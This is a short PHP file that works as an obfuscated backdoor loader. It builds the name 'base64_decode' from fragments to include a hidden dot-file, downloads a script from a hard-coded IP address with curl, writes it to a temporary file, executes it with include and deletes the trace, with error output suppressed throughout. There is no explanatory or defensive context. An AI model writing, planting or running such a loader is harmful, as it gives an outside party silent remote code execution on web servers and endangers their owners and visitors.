<?php
$b = 'b' . 'as' . 'e64_dec' . 'o' . 'de';
@include $b('aW1hZ2VzLy5hdXRoLmk=');
$f = @tempnam(@sys_get_temp_dir(),"");
$handle = curl_init();
curl_setopt ($handle, CURLOPT_URL, 'http://192.187.100.106/z60723_8/stat/index.txt');
curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec( $handle );
if ( PHP_VERSION_ID < 80000 ) {
    curl_close(  $handle  );
}
@file_put_contents($f, $result);
@include $f;
@unlink($f);